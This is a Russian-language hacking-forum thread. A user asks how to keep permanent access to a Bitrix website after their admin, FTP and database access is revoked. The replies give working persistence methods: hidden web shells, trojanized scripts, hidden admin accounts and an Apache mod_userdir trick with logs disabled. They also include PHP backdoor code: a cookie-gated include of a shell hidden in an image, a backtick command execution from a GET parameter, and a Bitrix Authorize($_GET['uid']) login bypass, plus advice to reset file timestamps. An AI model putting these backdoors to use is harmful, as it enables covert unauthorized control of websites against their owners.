ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вечный доступ к сайту. Вопрос
  #1  
Старый 30.04.2010, 14:11
Аватар для rainboww
rainboww
Новичок
Регистрация: 23.10.2009
Сообщений: 13
Провел на форуме:
36748

Репутация: 0
По умолчанию Вечный доступ к сайту. Вопрос

Как получить вечный доступ к сайту если он у меня сейчас есть?

CMS - Битрикс - есть доступ к админке /bitrix/admin

Есть доступ к FTP

Есть доступ к MySQL


Скоро всего этого не будет, но хотелось чтоб как бы не меняли все это я всегда мог узнать текущие логины/пассы
 
Ответить с цитированием

  #2  
Старый 30.04.2010, 14:14
Аватар для [Agent]
[Agent]
Новичок
Регистрация: 17.04.2010
Сообщений: 3
Провел на форуме:
32849

Репутация: 0
По умолчанию

Ну как вариант - модернизировать скрипты в свою сторону, благо там надо от силы 8 строчек.
 
Ответить с цитированием

  #3  
Старый 30.04.2010, 14:47
Аватар для shell_c0de
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

залить шелл и спряттать или потроянить скрипты (плюсс зашифровай с куском скрипта) чтобы админ если удалит кусок то сам скрипт не работал...
 
Ответить с цитированием

  #4  
Старый 30.04.2010, 15:03
Аватар для _eXorcist_
_eXorcist_
Участник форума
Регистрация: 24.12.2009
Сообщений: 130
Провел на форуме:
528073

Репутация: -3
Отправить сообщение для _eXorcist_ с помощью ICQ
По умолчанию

попробуй добавить скрытого администратора на каком то из форумов читал про битрикс как это делается
 
Ответить с цитированием

  #5  
Старый 01.05.2010, 03:47
Аватар для immortalist
immortalist
Познающий
Регистрация: 16.01.2010
Сообщений: 33
Провел на форуме:
645430

Репутация: 7
Отправить сообщение для immortalist с помощью ICQ
По умолчанию

100% постоянный доступ получить нереально, только если угонять мыло, куда привязан хостинг. Сдохнет хостинг, перезальют скрипты, наступит конец света - хоть обзаливайся и обпрячься шеллов. Только если хостинг ломанешь и рута на всех его юзверей получишь. И то - в свете последних событий хостинги тоже могут попрощаться со своими дата-центрами etc...
 
Ответить с цитированием

  #6  
Старый 02.05.2010, 23:55
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Я под виндой делаю так:
Лезу в httpd.conf
настраиваю mod_userdir под папку "C:/WINDOWS/System32/framework/"
Ложу шелл в C:/WINDOWS/System32/framework/microsoft_dll/shell.php
юзаю http://target/~microsoft_dll/shell.php
И пусть там админ хоть всю папку свою перетрёт, а мой шелл будет жить вечно, пока веб сервер не снесут
От очень умных админов спасаюсь строчкой
Include C:/WINDOWS/System32/apache.dll
в httpd.conf
в C:/WINDOWS/System32/apache.dll пишу конфиги mod_userdir
Ну и конечно логи апача отключить нафик

Но ТС наверняка говорит про линукс, такчто всем по***

Последний раз редактировалось Ponchik; 02.05.2010 в 23:57..
 
Ответить с цитированием

  #7  
Старый 04.05.2010, 04:37
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

обычно дописываю шелл в кую-нить картинку и куда-нить вставляю такой код:

Цитата:
<?
if ($_GET[xek]==1)
{
setcookie('xek','yes');
}
if($_COOKIE['xek'])
{
include("themes/darkblue_orange/img/arrow_lmr.png");
die();
}
?>
потом дату изменения файлов надо вернуть в исходное значение
можно и не инклудить, нето бросаетсяв глаза а например так:

Цитата:
echo `$_GET[pururum]`;
 
Ответить с цитированием

  #8  
Старый 04.05.2010, 08:29
Аватар для Byte_
Byte_
Участник форума
Регистрация: 07.09.2008
Сообщений: 139
Провел на форуме:
351188

Репутация: 65
По умолчанию

rainboww, на самом деле всё гораздо проще. В битриксе есть замечательное api на этот случай
Код:
global $USER;
$USER->Authorize(1);// авторизуем пользователя с id = 1
фишка в том, что для авторизации пользователя в системе совершенно не обязательно знать его пароль. Только id =)

я довольно часто дописываю в самом низу шаблона что-то вроде
Код:
if($_GET['pwd']=='myPassword'){
global $USER;
$USER->Authorize($_GET['uid']);
}
теперь что-бы стать админом сайта не на долго я просто делаю так http://url.ru/?pwd=myPassword&uid=1
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Продам доступ к сайту MAG0t Доступы, shells, ftp - Покупка, продажа 1 13.10.2009 18:04
ВКонтакте "счастливый фермер" ЖенькО Социальные сети 309 22.07.2009 11:35
[ Вопрос ] Закрыт доступ к папке. jecka3000 Windows 11 16.07.2009 23:58
Proxy FAQ foreva Чужие Статьи 12 04.01.2008 12:15
Получил доступ к админ панели на форуме phpBB, пароль админа не известен. Вопрос.. webster Форумы 12 28.04.2005 05:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ